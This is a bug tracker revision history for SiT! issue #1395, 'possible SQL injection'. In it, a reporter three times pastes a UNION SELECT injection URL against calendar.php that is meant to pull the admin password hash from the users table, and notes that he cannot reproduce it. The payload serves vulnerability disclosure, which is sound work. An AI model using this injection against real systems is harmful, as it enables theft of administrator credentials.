SiT! Bugs

View Revisions: Issue #1395 All Revisions ] Back to Issue ]
Summary 0001395: possible SQL injection
Revision 2010-09-11 12:35 by Tomse
Description /calendar.php?display=list&type=1 union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;--



I was given this line, it should extract the admin hash, I haven't been able to repro it..
Revision 2010-09-11 12:33 by Tomse
Description http://localhost/sit/calendar.php?display=list&type=1 [^] union all select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from sit_users where id=1;--



I was given this line, it should extract the admin hash, I haven't been able to repro it..
Revision 2010-09-08 15:28 by Tomse
Description http://site/sitrackerfolder/calendar.php?display=list&type=1 [^] union all
select 1,2,3,4,5,6,7,8,9,10,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
from users where id=1;--
--



I was given this line, it should extract the admin hash, I haven't been able to repro it..


Copyright © 2000 - 2021 MantisBT Team
Powered by Mantis Bugtracker